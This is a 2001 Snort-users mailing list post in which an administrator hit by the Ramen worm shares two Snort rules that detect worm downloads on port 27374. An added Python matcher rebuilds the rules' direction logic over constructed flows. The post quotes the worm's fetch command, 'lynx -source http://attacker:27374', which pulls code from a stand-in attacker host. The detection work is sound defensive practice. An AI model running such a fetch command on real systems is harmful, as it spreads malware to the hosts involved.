[Snort-users] Ramen Worm rules

Andrew Daviel andrew at ...523...
Thu Jan 18 13:02:18 EST 2001


We were just hit by the Ramen Worm
see http://members.home.net/dtmartin24/ramen_worm.txt

This is my attempt for a couple of rules. My tcpdump data isn't long
enough to match the content, actually I only have "GE" but I know it's
a GET - actually from "lynx -source http://attacker:27374"

# An external client fetching the worm from a home host serving on 27374; the "GET " is sent by the client, so match client -> server
alert tcp !$HOME_NET any -> $HOME_NET 27374 (msg:"Ramen Worm server active on network"; flags:PA; content:"GET ";)
# A home host fetching the worm (lynx -source http://attacker:27374) from an external server on 27374
alert tcp $HOME_NET any -> !$HOME_NET 27374 (msg:"Ramen Worm downloading"; flags:PA; content:"GET ";)


-- 
Andrew Daviel, TRIUMF, Canada
Tel. +1 (604) 222-7376
security at ...524...
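The two rules' port, direction, flag and content checks, rebuilt as a small Python matcher and run over constructed TCP flows so the direction logic can be checked offline. This is an added example, not code from the original post or from Snort; the home network (192.168.1.0/24), addresses and payloads are constructed, and the "GET " is matched only in the client-to-27374 direction, since the server's reply never carries it.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

# Constructed stand-in for Snort's $HOME_NET
HOME_NET = ipaddress.ip_network("192.168.1.0/24")


@dataclass
class Flow:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str       # TCP flags in Snort letters, e.g. "PA"
    payload: bytes


@dataclass
class Rule:
    msg: str
    src_home: bool          # True = $HOME_NET, False = !$HOME_NET
    sport: Optional[int]    # None = any
    dst_home: bool
    dport: Optional[int]
    flags: str
    content: bytes

    def matches(self, f: Flow) -> bool:
        def in_home(ip: str) -> bool:
            return ipaddress.ip_address(ip) in HOME_NET
        return (in_home(f.src) == self.src_home
                and in_home(f.dst) == self.dst_home
                and (self.sport is None or f.sport == self.sport)
                and (self.dport is None or f.dport == self.dport)
                # flags:PA with no modifier is an exact match in Snort
                and set(f.flags) == set(self.flags)
                and self.content in f.payload)


RULES = [
    Rule("Ramen Worm server active on network", False, None, True, 27374, "PA", b"GET "),
    Rule("Ramen Worm downloading", True, None, False, 27374, "PA", b"GET "),
]


def alerts(f: Flow) -> List[str]:
    """Return the msg of every rule that fires on this flow."""
    return [r.msg for r in RULES if r.matches(f)]
```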